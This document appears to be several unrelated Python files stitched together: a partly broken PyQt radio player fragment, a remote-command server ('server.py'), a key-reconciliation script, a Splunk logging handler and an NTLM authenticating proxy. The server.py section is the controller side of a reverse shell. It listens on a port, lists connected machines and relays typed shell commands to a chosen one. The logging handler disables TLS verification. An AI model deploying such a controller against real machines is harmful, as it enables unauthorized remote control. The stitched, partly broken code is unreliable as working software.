self.ui.pushButton.clicked.connect(self.PlayMusic)
self.ui.pushButton_2.clicked.connect(self.StopMusic)
self.ui.listView.currentTextChanged.connect(self.PlayMusic)
def openPlayList(self):
import subprocess as sp
programName = "notepad.exe"
#This is name for txt file"
#This is radio Stream for your ----"My radio online.txt"----file for test 1.Kiss radio Los-Angeles-usa.|http://stream.revma.ihrhls.com/zc185
fileName = "My radio online.txt"
#My radio online.txt"
sp.Popen([programName, fileName])
#----------------------------------------
#import subprocess as sp
programName = "sndvol.exe"
fileName = "sndvol.exe"
sp.Popen([programName, fileName])
#----------------------------------------
def help(self):
webbrowser.open("https://forum.lugasat.org.ua/viewtopic.php?t=965")
webbrowser.open (" https://www.aimp.ru/forum/index.php?topic=22023.6675")
def PlayMusic(self):
global songflag
songflag=0
time.sleep(1)
name=self.ui.listView.currentItem().text()
for x in canals:
if name in x:
mas=x.split('|')
canal=mas[1].strip()
print(name)
playradio(canal)
def StopMusic(self):
global songflag
songflag=0
time.sleep(1)
def set_volume(v):
global vol
global player
#either get the new volume from given argument v (type: str):
value = int(v)
#or get it directly from Scale widget (type: int)
value = vol.get()
player.audio_set_volume(value)
vol = Scale(..., command=set_volume)
def show_value(self):
global player
i = vol.get()
player.audio_set_volume(i)
vol = Scale(root,from_ = 0,to = 100,orient = HORIZONTAL ,resolution = 1)
vol.place(x=75, y = 300)
vol.set(50)
#song = ""
def closeEvent(self,event):
import win32com.client as mouth
voice = mouth.Dispatch("SAPI.SpVoice")
word_to_say = '''Goodbye, thank you for listening to online
radio stations well If you want to add a new radio station or
replace the old one you need to add to the folder of the text
document python the
link address of the online radio stream I hope our information helped'''
voice.Speak(word_to_say)
StopMusic()
event.accept()
instance = vlc.Instance()
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("Main Radio")
MainWindow.resize(298, 411)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.pushButton_5 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_5.setGeometry(QtCore.QRect(158, 338, 121, 53))
self.pushButton_5.setObjectName("pushButton")
self.pushButton_5.setStyleSheet("QPushButton"
"{"
"background-color :yellow;"
"}"
"QPushButton::pressed"
"{"
"background-color : lightgreen;"
"}"
)
self.pushButton_3 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_3.setGeometry(QtCore.QRect(18, 338, 121,53))
self.pushButton_3.setObjectName("pushButton")
self.pushButton_3.setStyleSheet("QPushButton"
"{"
"background-color : dodgerblue ;"
"}"
"QPushButton::pressed"
"{"
"background-color : lightgreen;"
"}"
)
self.pushButton = QtWidgets.QPushButton(self.centralwidget)
self.pushButton.setGeometry(QtCore.QRect(18, 20, 122, 53))
self.pushButton.setObjectName("pushButton")
self.pushButton.setStyleSheet("QPushButton"
"{"
"background-color : seagreen;"
"}"
"QPushButton::pressed"
"{"
"background-color : lightgreen;"
"}"
)
self.pushButton_2 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_2.setGeometry(QtCore.QRect(157, 20, 122, 53))
self.pushButton_2.setObjectName("pushButton_2")
self.pushButton_2.setStyleSheet("QPushButton"
"{"
"background-color :indianred ;"
"}"
"QPushButton::pressed"
"{"
"background-color : red;"
"}"
)
self.listView = QtWidgets.QListWidget(self.centralwidget)
self.listView.setGeometry(QtCore.QRect(18, 80, 261, 250))
self.listView.setObjectName("listView")
self.listView.setStyleSheet("background-color: lightseagreen; border: 1px solid roylblue; border: 1px solid springgreen; foreground-color: text lightgreen;")
MainWindow.setCentralWidget(self.centralwidget)
# creating a label widget
#
# setting up background color
#self.pushButton_5.setStyleSheet("background-color: royalblue; border: 1px solid gray;")
# creating a label widget
# setting up background color and border
#self.pushButton_3.setStyleSheet("background-color: yellow; border: 1px solid roylblue;")
# show all the widgets
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow","MainWindow"))
self.pushButton.setText(_translate("MainWindow","PLAY\n►\nRadio"))
self.pushButton_2.setText(_translate("MainWindow","STOP\n⬛\nRadio"))
self.pushButton_3.setText(_translate("MainWindow","🔎 RADIO\n Stream"))
self.pushButton_5.setText(_translate("MainWindow","OPEN TXT\nList 📂"))
if __name__=="__main__":
app = QtWidgets.QApplication(sys.argv)
myapp = MyWin()
myapp.setWindowTitle('KRB<))DJ((>ONLINE RADIO STATIONS')
myapp.setStyleSheet("background-color: royalblue; border: 3px solid blue; border: 2px solid springgreen;")
myapp.setFixedSize(298, 411)
myapp.show()
sys.exit(app.exec_())
openPlayList()
help()
|
server.py
|
import socket
import sys
import threading
import time
from queue import Queue
NUMBER_OF_THREADS = 2
JOB_NUMBER = [1, 2]
queue = Queue()
all_connections = []
all_address = []
# Create a socket (connect to computer)
def create_socket():
try:
global host
global port
global s
host = ""
port = 9999
s = socket.socket()
except socket.error as msg:
print("Socket creation error: ", str(msg))
# Binding the socket and listening for connections
def bind_socket():
try:
global host
global port
global s
print("binding the port: " + str(port))
s.bind((host, port))
s.listen(5)
except socket.error as msg:
print("Socket binding error: ", str(msg) + '\n' + 'Retrying....')
bind_socket()
# Handling connection form multiple clients and saving to a list
# closing previous connections when server.py file is restarted
def accepting_connections():
for c in all_connections:
c.close()
del all_connections[:]
del all_address[:]
while True:
try:
conn, address = s.accept()
s.setblocking(1) # prevents timeout
all_connections.append(conn)
all_address.append(address)
print("Connection has been established : " + address[0])
except:
print("Error accepting connections.")
# 2nd thread functions - 1) see all the clients 2) select a client 3) send commands to the connected client.
# Interactive prompt for sending commands
# turtle > list
# 0 friend-A Port
# 1 Friend-B Port
# turtle > select 1
# 192.168.0.1> dir
def start_turtle():
while True:
cmd = input('turtle> ')
if cmd == 'list':
list_connections()
elif 'select' in cmd:
conn = get_target(cmd)
if conn is not None:
send_target_commands(conn)
else:
print("Command not recognised.")
# Display all current active connections with the client
def list_connections():
results = ''
for i, conn in enumerate(all_connections):
try:
conn.send(str.encode(' '))
conn.recv(101480)
except:
del all_connections[i]
del all_address[i]
continue
results = str(i) + " " + str(all_address[i][0]) + " " + str(all_address[i][1]) + "\n"
print("---- Clients -----" + "\n" + results)
# selecting the target
def get_target(cmd):
try:
target = cmd.replace('select ', '') # target = id
target = int(target)
conn = all_connections[target]
print("You are now connected to :" + str(all_address[target][0]))
print(str(all_address[target][0]) + ">", end="")
# 192.168.0.4>
return conn
except:
print("Selection not valid")
def send_target_commands(conn):
while True:
try:
cmd = input()
if cmd == 'quit':
break
if len(str.encode(cmd)) > 0:
conn.send(str.encode(cmd))
client_response = str(conn.recv(20480), 'utf-8')
print(client_response, end="")
except:
print("Error sending commands")
break
# Create worker threads
def create_workers():
for _ in range(NUMBER_OF_THREADS):
t = threading.Thread(target=work)
t.daemon = True
t.start()
# Do next job that is in the queue and (handle connections, send commands)
def work():
while True:
x = queue.get()
if x == 1:
create_socket()
bind_socket()
accepting_connections()
if x == 2:
start_turtle()
queue.task_done()
def create_jobs():
for x in JOB_NUMBER:
queue.put(x)
queue.join()
create_workers()
create_jobs()
|
bob.py
|
__author__ = "mashed-potatoes"
from threading import Thread
from os import _exit
from modules.hamming import *
from modules.config import *
from modules.iohelper import update_file
from modules.sender import RemoteHost
from modules.http_server import NetIO
from modules.logger import Logger
from modules.qber import calc_ber
from pymitter import EventEmitter
ee = EventEmitter()
l = Logger()
server = NetIO(64296)
rh = RemoteHost(REMOTE_HOST, l)
iteration = 0
@ee.on("parity generated")
def on_patrity_generated(sid):
l.ok()
rh.emit("send parity")
@ee.on("parity sent")
def on_parity_received(sid):
global LEN_NES
l.ok()
l.proc("Generating bad blocks")
hamming_correct(
BOB_KEY, PARITY, TEMP, BAD_BLOCKS, POWER, len_nes=LEN_NES // 11, drop_bad=True
)
l.ok()
update_file(TEMP, BOB_KEY)
l.proc("Shuffling key")
shuffle(BOB_KEY, TEMP, LEN_SHUFFLE, 0)
update_file(TEMP, BOB_KEY)
l.ok()
l.proc("Sending badblocks")
rh.send_file(BAD_BLOCKS)
l.ok()
LEN_NES = 0
l.proc("Wiping badblocks")
rh.emit("wipe badblocks", LEN_NES)
@ee.on("blocks wiped")
def on_blocks_wiped(sid):
l.ok()
rh.emit("shuffle key")
@ee.on("iteration ended")
def on_next_iteration(sid):
global iteration
if iteration == ITERATIONS:
l.info("Task finished!")
calc_ber(l)
l.proc("Terminating Alice")
rh.emit("exit")
l.ok()
_exit(0)
l.info(f"*** THE ITERATION {iteration + 1} of {ITERATIONS} ***")
calc_ber(l)
iteration += 1
rh.emit("generate parity")
@ee.on("message")
def message(args):
global iteration
if 'Hello' in args:
l.info(f"Connected to Alice")
l.proc("Generating parity")
rh.emit("generate parity")
iteration += 1
def recover_keys():
import subprocess
subprocess.call(["bash", "recover_keys.sh"])
l.info("Keys recovered")
def run():
global server
l.info("Running Bob...")
# Debug only
recover_keys()
server.set_emitter(ee)
Thread(target=server.start).start()
|
splunk_hec_logging_handler.py
|
from __future__ import absolute_import
import json
import logging
import os
import threading
import time
import datetime
import socket
import traceback
import platform
import commands
import atexit
from requests_futures import sessions
def setInterval(interval):
def decorator(function):
def wrapper(*args, **kwargs):
stopped = threading.Event()
def loop(): # executed in another thread
while True:
if stopped.is_set():
return
else:
function(*args, **kwargs)
time.sleep(interval)
t = threading.Thread(target=loop)
t.daemon = True
t.start()
return stopped
return wrapper
return decorator
class SplunkHECHandler(logging.Handler):
def __init__(self, targetserver, hec_token, eventgen_name=None):
self._name = 'eventgen_splunk_hec_logger'
self.targetserver = targetserver
self.hec_token = hec_token
self.host = socket.gethostname()
self.pid = os.getpid()
self.events = []
self.send = True
self.os = platform.platform()
self.system_username = commands.getoutput('whoami')
self.eventgen_name = eventgen_name
atexit.register(self._stopFlushTimer)
self.log = logging.getLogger(self._name)
self.log.setLevel(logging.DEBUG)
self.log.info("SplunkHECHandler logger is initialized")
try:
self.ip = [l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in[socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) if l][0][0]
except:
self.ip = "unknown"
self.session = sessions.FuturesSession(max_workers=32)
if not targetserver or not hec_token:
self.log.warn("Please provide valid targetserver and hec_token in default/eventgen_engine.conf.")
self.send = False
super(SplunkHECHandler, self).__init__()
self.timer = self._flushAndRepeatTimer()
@setInterval(1)
def _flushAndRepeatTimer(self):
if self.send:
self.flush()
def _stopFlushTimer(self):
if self.send:
self.send = False
self.flush()
self.timer.set()
def _getEndpoint(self):
targeturi = "{0}/services/collector/event".format(self.targetserver)
return targeturi
def _getTraceback(self, record):
if record.exc_info:
return traceback.format_exc()
return None
def _getPayload(self, record):
payload = {
'event': {
'log': record.name,
'level': logging.getLevelName(record.levelno),
'message': record.getMessage(),
'local_time': str(datetime.datetime.now()),
'ip': self.ip,
'os': self.os,
'system_username': self.system_username,
'eventgen_name': self.eventgen_name
},
'time': time.time(),
'index': 'eventgen',
'source': 'eventgen',
'sourcetype': 'eventgen6',
'host': self.host,
}
tb = self._getTraceback(record)
if tb:
payload['traceback'] = tb
return json.dumps(payload)
def _sendHTTPEvents(self, current_batch):
currentreadsize = 0
stringpayload = ""
totalbytesexpected = 0
totalbytessent = 0
for line in current_batch:
targetline = str(line)
targetlinesize = len(targetline)
totalbytesexpected += targetlinesize
if (int(currentreadsize) + int(targetlinesize)) <= 10000: #10000 is the default max size of HEC sessions
stringpayload = stringpayload + targetline
currentreadsize = currentreadsize + targetlinesize
else:
try:
self._transmitEvents(stringpayload)
totalbytessent += len(stringpayload)
currentreadsize = 0
stringpayload = targetline
except Exception as e:
raise e
else:
try:
totalbytessent += len(stringpayload)
self._transmitEvents(stringpayload)
except Exception as e:
raise e
def _transmitEvents(self, data):
# Sending events every 10 seconds
try:
self.session.post(self._getEndpoint(),
data=data,
headers={'Authorization': 'Splunk {0}'.format(self.hec_token), 'content-type': 'application/json'},
verify=False)
time.sleep(10)
except Exception as e:
self.log.exception(e)
raise e
def flush(self):
self.log.debug('Flush Running. Num of events: {}.'.format(len(self.events)))
events = self.events
self.events = []
if self.send:
self._sendHTTPEvents(events)
def emit(self, record):
"""
Override emit() method in handler parent for sending log to RESTful API
"""
pid = os.getpid()
if pid != self.pid:
self.pid = pid
self.events = []
self.timer = self._flushAndRepeatTimer()
atexit.register(self._stopFlushTimer)
if record.name.startswith('requests') or record.name in ['urllib3.connectionpool']:
return
self.events.append(self._getPayload(record))
|
px.py
|
"Px is an HTTP proxy server to automatically authenticate through an NTLM proxy"
"Me Test on GitHub"
from __future__ import print_function
__version__ = "0.4.0"
import base64
import ctypes
import ctypes.wintypes
import multiprocessing
import os
import select
import signal
import socket
import sys
import threading
import time
import traceback
# Print if possible
def pprint(*objs):
try:
print(*objs)
except:
pass
# Dependencies
try:
import concurrent.futures
except ImportError:
pprint("Requires module futures")
sys.exit()
try:
import netaddr
except ImportError:
pprint("Requires module netaddr")
sys.exit()
try:
import psutil
except ImportError:
pprint("Requires module psutil")
sys.exit()
try:
import pywintypes
import sspi
except ImportError:
pprint("Requires module pywin32")
sys.exit()
try:
import winkerberos
except ImportError:
pprint("Requires module winkerberos")
sys.exit()
try:
import ntlm_auth.ntlm
except ImportError:
pprint("Requires module ntlm-auth")
sys.exit()
try:
import keyring
import keyring.backends.Windows
keyring.set_keyring(keyring.backends.Windows.WinVaultKeyring())
except ImportError:
pprint("Requires module keyring")
sys.exit()
# Python 2.x vs 3.x support
try:
import configparser
import http.server as httpserver
import socketserver
import urllib.parse as urlparse
import winreg
except ImportError:
import ConfigParser as configparser
import SimpleHTTPServer as httpserver
import SocketServer as socketserver
import urlparse
import _winreg as winreg
os.getppid = psutil.Process().ppid
PermissionError = WindowsError
HELP = """Px v%s
An HTTP proxy server to automatically authenticate through an NTLM proxy
Usage:
px [FLAGS]
python px.py [FLAGS]
Actions:
--save
Save configuration to px.ini or file specified with --config
Allows setting up Px config directly from command line
Values specified on CLI override any values in existing config file
Values not specified on CLI or config file are set to defaults
--install
Add Px to the Windows registry to run on startup
--uninstall
Remove Px from the Windows registry
--quit
Quit a running instance of Px.exe
Configuration:
--config=
Specify config file. Valid file path, default: px.ini in working directory
--proxy= --server= proxy:server= in INI file
NTLM server(s) to connect through. IP:port, hostname:port
Multiple proxies can be specified comma separated. Px will iterate through
and use the one that works. Required field unless --noproxy is defined. If
remote server is not in noproxy list and proxy is undefined, Px will reject
the request
--listen= proxy:listen=
IP interface to listen on. Valid IP address, default: 127.0.0.1
--port= proxy:port=
Port to run this proxy. Valid port number, default: 3128
--gateway proxy:gateway=
Allow remote machines to use proxy. 0 or 1, default: 0
Overrides 'listen' and binds to all interfaces
--hostonly proxy:hostonly=
Allow only local interfaces to use proxy. 0 or 1, default: 0
Px allows all IP addresses assigned to local interfaces to use the service.
This allows local apps as well as VM or container apps to use Px when in a
NAT config. Px does this by listening on all interfaces and overriding the
allow list.
--allow= proxy:allow=
Allow connection from specific subnets. Comma separated, default: *.*.*.*
Whitelist which IPs can use the proxy. --hostonly overrides any definitions
unless --gateway mode is also specified
127.0.0.1 - specific ip
192.168.0.* - wildcards
192.168.0.1-192.168.0.255 - ranges
192.168.0.1/24 - CIDR
--noproxy= proxy:noproxy=
Direct connect to specific subnets like a regular proxy. Comma separated
Skip the NTLM proxy for connections to these subnets
127.0.0.1 - specific ip
192.168.0.* - wildcards
192.168.0.1-192.168.0.255 - ranges
192.168.0.1/24 - CIDR
--useragent= proxy:useragent=
Override or send User-Agent header on client's behalf
--username= proxy:username=
Authentication to use when SSPI is unavailable. Format is domain\\username
Service name "Px" and this username are used to retrieve the password using
Python keyring. Px only retrieves credentials and storage should be done
directly in the keyring backend.
On Windows, Credential Manager is the backed and can be accessed from
Control Panel > User Accounts > Credential Manager > Windows Credentials.
Create a generic credential with Px as the network address, this username
and corresponding password.
--workers= settings:workers=
Number of parallel workers (processes). Valid integer, default: 2
--threads= settings:threads=
Number of parallel threads per worker (process). Valid integer, default: 5
--idle= settings:idle=
Idle timeout in seconds for HTTP connect sessions. Valid integer, default: 30
--socktimeout= settings:socktimeout=
Timeout in seconds for connections before giving up. Valid float, default: 20
--proxyreload= settings:proxyreload=
Time interval in seconds before refreshing proxy info. Valid int, default: 60
Proxy info reloaded from a PAC file found via WPAD or AutoConfig URL, or
manual proxy info defined in Internet Options
--foreground settings:foreground=
Run in foreground when frozen or with pythonw.exe. 0 or 1, default: 0
Px will attach to the console and write to it even though the prompt is
available for further commands. CTRL-C in the console will exit Px
--debug settings:log=
Enable debug logging. default: 0
Logs are written to working directory and over-written on startup
A log is automatically created if Px crashes for some reason
--uniqlog
Generate unique log file names
Prevents logs from being overwritten on subsequent runs. Also useful if
running multiple instances of Px""" % __version__
# Windows version
# 6.1 = Windows 7
# 6.2 = Windows 8
# 6.3 = Windows 8.1
# 10.0 = Windows 10
WIN_VERSION = float(str(sys.getwindowsversion().major) + "." + str(sys.getwindowsversion().minor))
# Proxy modes - source of proxy info
MODE_NONE = 0
MODE_CONFIG = 1
MODE_AUTO = 2
MODE_PAC = 3
MODE_MANUAL = 4
class State(object):
allow = netaddr.IPGlob("*.*.*.*")
config = None
domain = ""
exit = False
hostonly = False
logger = None
noproxy = netaddr.IPSet([])
noproxy_hosts = []
pac = ""
proxy_mode = MODE_NONE
proxy_refresh = None
proxy_server = []
proxy_type = {}
stdout = None
useragent = ""
username = ""
ini = "px.ini"
max_disconnect = 3
max_line = 65536 + 1
# Locks for thread synchronization;
# multiprocess sync isn't neccessary because State object is only shared by
# threads but every process has it's own State object
proxy_type_lock = threading.Lock()
proxy_mode_lock = threading.Lock()
class Response(object):
__slots__ = ["code", "length", "headers", "data", "body", "chunked", "close"]
def __init__(self, code=503):
self.code = code
self.length = 0
self.headers = []
self.data = None
self.body = False
self.chunked = False
self.close = False
class Log(object):
def __init__(self, name, mode):
self.file = open(name, mode)
self.stdout = sys.stdout
self.stderr = sys.stderr
sys.stdout = self
sys.stderr = self
def close(self):
sys.stdout = self.stdout
sys.stderr = self.stderr
self.file.close()
def write(self, data):
try:
self.file.write(data)
except:
pass
if self.stdout is not None:
self.stdout.write(data)
self.flush()
def flush(self):
self.file.flush()
os.fsync(self.file.fileno())
if self.stdout is not None:
self.stdout.flush()
def dprint(msg):
if State.logger is not None:
# Do locking to avoid mixing the output of different threads as there are
# two calls to print which could otherwise interleave
sys.stdout.write(
multiprocessing.current_process().name + ": " +
threading.current_thread().name + ": " + str(int(time.time())) +
": " + sys._getframe(1).f_code.co_name + ": " + msg + "\n")
def dfile():
name = multiprocessing.current_process().name
if "--quit" in sys.argv:
name = "quit"
if "--uniqlog" in sys.argv:
name = "%s-%f" % (name, time.time())
logfile = os.path.join(os.path.dirname(get_script_path()), "debug-%s.log" % name)
return logfile
def reopen_stdout():
clrstr = "\r" + " " * 80 + "\r"
if State.logger is None:
State.stdout = sys.stdout
sys.stdout = open("CONOUT$", "w")
sys.stdout.write(clrstr)
else:
State.stdout = State.logger.stdout
State.logger.stdout = open("CONOUT$", "w")
State.logger.stdout.write(clrstr)
def restore_stdout():
if State.logger is None:
sys.stdout.close()
sys.stdout = State.stdout
else:
State.logger.stdout.close()
State.logger.stdout = State.stdout
###
# NTLM support
def b64decode(val):
try:
return base64.decodebytes(val.encode("utf-8"))
except AttributeError:
return base64.decodestring(val)
def b64encode(val):
try:
return base64.encodebytes(val.encode("utf-8"))
except AttributeError:
return base64.encodestring(val)
class NtlmMessageGenerator:
# use proxy server as parameter to use the one to which connecting was successful (doesn't need to be the first of the list)
def __init__(self, proxy_type, proxy_server_address):
pwd = ""
if State.username:
pwd = keyring.get_password("Px", State.domain + "\\" + State.username)
if proxy_type == "NTLM":
if not pwd:
self.ctx = sspi.ClientAuth("NTLM", os.environ.get("USERNAME"), scflags=0)
self.get_response = self.get_response_sspi
else:
self.ctx = ntlm_auth.ntlm.NtlmContext(State.username, pwd, State.domain, "", ntlm_compatibility=3)
self.get_response = self.get_response_ntlm
else:
principal = None
if pwd:
if State.domain:
principal = (urlparse.quote(State.username) + "@" +
urlparse.quote(State.domain) + ":" + urlparse.quote(pwd))
else:
principal = urlparse.quote(State.username) + ":" + urlparse.quote(pwd)
_, self.ctx = winkerberos.authGSSClientInit("HTTP@" + proxy_server_address,
principal=principal, gssflags=0, mech_oid=winkerberos.GSS_MECH_OID_SPNEGO)
self.get_response = self.get_response_wkb
def get_response_sspi(self, challenge=None):
dprint("pywin32 SSPI")
if challenge:
challenge = b64decode(challenge)
output_buffer = None
try:
error_msg, output_buffer = self.ctx.authorize(challenge)
except pywintypes.error:
traceback.print_exc(file=sys.stdout)
return None
response_msg = b64encode(output_buffer[0].Buffer)
response_msg = response_msg.decode("utf-8").replace('\012', '')
return response_msg
def get_response_wkb(self, challenge=""):
dprint("winkerberos SSPI")
try:
winkerberos.authGSSClientStep(self.ctx, challenge)
auth_req = winkerberos.authGSSClientResponse(self.ctx)
except winkerberos.GSSError:
traceback.print_exc(file=sys.stdout)
return None
return auth_req
def get_response_ntlm(self, challenge=""):
dprint("ntlm-auth")
if challenge:
challenge = b64decode(challenge)
response_msg = b64encode(self.ctx.step(challenge))
response_msg = response_msg.decode("utf-8").replace('\012', '')
return response_msg
###
# Proxy handler
class Proxy(httpserver.SimpleHTTPRequestHandler):
protocol_version = "HTTP/1.1"
# Contains the proxy servers responsible for the url this Proxy instance (aka thread) serves
proxy_servers = []
proxy_socket = None
def handle_one_request(self):
try:
httpserver.SimpleHTTPRequestHandler.handle_one_request(self)
except socket.error as e:
dprint("Socket error: %s" % e)
if not hasattr(self, "_host_disconnected"):
self._host_disconnected = 1
dprint("Host disconnected")
elif self._host_disconnected < State.max_disconnect:
self._host_disconnected += 1
dprint("Host disconnected: %d" % self._host_disconnected)
else:
dprint("Closed connection to avoid infinite loop")
self.close_connection = True
def address_string(self):
host, port = self.client_address[:2]
#return socket.getfqdn(host)
return host
def log_message(self, format, *args):
dprint(format % args)
def do_socket_connect(self, destination=None):
# Already connected?
if self.proxy_socket is not None:
return True
dests = list(self.proxy_servers) if destination is None else [destination]
for dest in dests:
dprint("New connection: " + str(dest))
proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
proxy_socket.connect(dest)
self.proxy_address = dest
self.proxy_socket = proxy_socket
break
except Exception as e:
dprint("Connect failed: %s" % e)
# move a non reachable proxy to the end of the proxy list;
if len(self.proxy_servers) > 1:
# append first and then remove, this should ensure thread safety with
# manual configurated proxies (in this case self.proxy_servers references the
# shared State.proxy_server)
self.proxy_servers.append(dest)
self.proxy_servers.remove(dest)
if self.proxy_socket is not None:
return True
return False
def do_socket(self, xheaders={}, destination=None):
dprint("Entering")
# Connect to proxy or destination
if not self.do_socket_connect(destination):
return Response(408)
# No chit chat on SSL
if destination is not None and self.command == "CONNECT":
return Response(200)
cl = 0
chk = False
expect = False
keepalive = False
ua = False
cmdstr = "%s %s %s\r\n" % (self.command, self.path, self.request_version)
self.proxy_socket.sendall(cmdstr.encode("utf-8"))
dprint(cmdstr.strip())
for header in self.headers:
hlower = header.lower()
if hlower == "user-agent" and State.useragent != "":
ua = True
h = "%s: %s\r\n" % (header, State.useragent)
else:
h = "%s: %s\r\n" % (header, self.headers[header])
self.proxy_socket.sendall(h.encode("utf-8"))
dprint("Sending %s" % h.strip())
if hlower == "content-length":
cl = int(self.headers[header])
elif hlower == "expect" and self.headers[header].lower() == "100-continue":
expect = True
elif hlower == "proxy-connection":
keepalive = True
elif hlower == "transfer-encoding" and self.headers[header].lower() == "chunked":
dprint("CHUNKED data")
chk = True
if not keepalive and self.request_version.lower() == "http/1.0":
xheaders["Proxy-Connection"] = "keep-alive"
if not ua and State.useragent != "":
xheaders["User-Agent"] = State.useragent
for header in xheaders:
h = ("%s: %s\r\n" % (header, xheaders[header])).encode("utf-8")
self.proxy_socket.sendall(h)
if header.lower() != "proxy-authorization":
dprint("Sending extra %s" % h.strip())
else:
dprint("Sending extra %s: sanitized len(%d)" % (header, len(xheaders[header])))
self.proxy_socket.sendall(b"\r\n")
if self.command in ["POST", "PUT", "PATCH"]:
if not hasattr(self, "body"):
dprint("Getting body for POST/PUT/PATCH")
if cl:
self.body = self.rfile.read(cl)
else:
self.body = self.rfile.read()
dprint("Sending body for POST/PUT/PATCH: %d = %d" % (cl or -1, len(self.body)))
self.proxy_socket.sendall(self.body)
self.proxy_fp = self.proxy_socket.makefile("rb")
resp = Response()
if self.command != "HEAD":
resp.body = True
# Response code
for i in range(2):
dprint("Reading response code")
line = self.proxy_fp.readline(State.max_line)
if line == b"\r\n":
line = self.proxy_fp.readline(State.max_line)
try:
resp.code = int(line.split()[1])
except (ValueError, IndexError):
dprint("Bad response %s" % line)
if line == b"":
dprint("Client closed connection")
return Response(444)
if (b"connection established" in line.lower() or
resp.code == 204 or resp.code == 304):
resp.body = False
dprint("Response code: %d " % resp.code + str(resp.body))
# Get response again if 100-Continue
if not (expect and resp.code == 100):
break
# Headers
dprint("Reading response headers")
while not State.exit:
line = self.proxy_fp.readline(State.max_line).decode("utf-8")
if line == b"":
if self.proxy_socket:
self.proxy_socket.close()
self.proxy_socket = None
dprint("Proxy closed connection: %s" % resp.code)
return Response(444)
if line == "\r\n":
break
nv = line.split(":", 1)
if len(nv) != 2:
dprint("Bad header =>%s<=" % line)
continue
name = nv[0].strip()
value = nv[1].strip()
resp.headers.append((name, value))
if name.lower() != "proxy-authenticate":
dprint("Received %s: %s" % (name, value))
else:
dprint("Received %s: sanitized (%d)" % (name, len(value)))
if name.lower() == "content-length":
resp.length = int(value)
if not resp.length:
resp.body = False
elif name.lower() == "transfer-encoding" and value.lower() == "chunked":
resp.chunked = True
resp.body = True
elif name.lower() in ["proxy-connection", "connection"] and value.lower() == "close":
resp.close = True
return resp
def do_proxy_type(self):
# Connect to proxy
if not hasattr(self, "proxy_address"):
if not self.do_socket_connect():
return Response(408), None
State.proxy_type_lock.acquire()
try:
# Read State.proxy_type only once and use value for function return if it is not None;
# State.proxy_type should only be read here to avoid getting None after successfully
# identifying the proxy type if another thread clears it with load_proxy
proxy_type = State.proxy_type.get(self.proxy_address)
if proxy_type is None:
# New proxy, don't know type yet
dprint("Searching proxy type")
resp = self.do_socket()
proxy_auth = ""
for header in resp.headers:
if header[0] == "Proxy-Authenticate":
proxy_auth += header[1] + " "
if "NTLM" in proxy_auth.upper():
proxy_type = "NTLM"
elif "KERBEROS" in proxy_auth.upper():
proxy_type = "KERBEROS"
elif "NEGOTIATE" in proxy_auth.upper():
proxy_type = "NEGOTIATE"
if proxy_type is not None:
# Writing State.proxy_type only once but use local variable as return value to avoid
# losing the query result (for the current request) by clearing State.proxy_type in load_proxy
State.proxy_type[self.proxy_address] = proxy_type
dprint("Auth mechanisms: " + proxy_auth)
dprint("Selected: " + str(self.proxy_address) + ": " + str(proxy_type))
return resp, proxy_type
return Response(407), proxy_type
finally:
State.proxy_type_lock.release()
def do_transaction(self):
dprint("Entering")
ipport = self.get_destination()
if ipport not in [False, True]:
dprint("Skipping NTLM proxying")
resp = self.do_socket(destination=ipport)
elif ipport:
# Get proxy type directly from do_proxy_type instead by accessing State.proxy_type do avoid
# a race condition with clearing State.proxy_type in load_proxy which sometimes led to a proxy type
# of None (clearing State.proxy_type in one thread was done after another thread's do_proxy_type but
# before accessing State.proxy_type in the second thread)
resp, proxy_type = self.do_proxy_type()
if resp.code == 407:
# Unknown auth mechanism
if proxy_type is None:
dprint("Unknown auth mechanism expected")
return resp
# Generate auth message
ntlm = NtlmMessageGenerator(proxy_type, self.proxy_address[0])
ntlm_resp = ntlm.get_response()
if ntlm_resp is None:
dprint("Bad NTLM response")
return Response(503)
self.fwd_data(resp, flush=True)
# Send auth message
resp = self.do_socket({
"Proxy-Authorization": "%s %s" % (proxy_type, ntlm_resp)
})
if resp.code == 407:
dprint("Auth required")
ntlm_challenge = ""
for header in resp.headers:
if header[0] == "Proxy-Authenticate" and proxy_type in header[1].upper():
h = header[1].split()
if len(h) == 2:
ntlm_challenge = h[1]
break
if ntlm_challenge:
dprint("Challenged")
ntlm_resp = ntlm.get_response(ntlm_challenge)
if ntlm_resp is None:
dprint("Bad NTLM response")
return Response(503)
self.fwd_data(resp, flush=True)
# Reply to challenge
resp = self.do_socket({
"Proxy-Authorization": "%s %s" % (proxy_type, ntlm_resp)
})
else:
dprint("Didn't get challenge, auth didn't work")
else:
dprint("No auth required cached")
else:
dprint("No auth required")
else:
dprint("No proxy server specified and not in noproxy list")
return Response(501)
return resp
def do_HEAD(self):
dprint("Entering")
self.do_GET()
dprint("Done")
def do_PAC(self):
resp = Response(404)
if State.proxy_mode == MODE_PAC and "file://" in State.pac:
pac = file_url_to_local_path(State.pac)
dprint(pac)
try:
resp.code = 200
with open(pac) as p:
resp.data = p.read().encode("utf-8")
resp.body = True
resp.headers = [
("Content-Length", len(resp.data)),
("Content-Type", "application/x-ns-proxy-autoconfig")
]
except:
traceback.print_exc(file=sys.stdout)
return resp
def do_GET(self):
dprint("Entering")
dprint("Path = " + self.path)
if "/PxPACFile.pac" in self.path:
resp = self.do_PAC()
else:
resp = self.do_transaction()
if resp.code >= 400:
dprint("Error %d" % resp.code)
self.send_error(resp.code)
else:
self.fwd_resp(resp)
dprint("Done")
def do_POST(self):
dprint("Entering")
self.do_GET()
dprint("Done")
def do_PUT(self):
dprint("Entering")
self.do_GET()
dprint("Done")
def do_DELETE(self):
dprint("Entering")
self.do_GET()
dprint("Done")
def do_PATCH(self):
dprint("Entering")
self.do_GET()
dprint("Done")
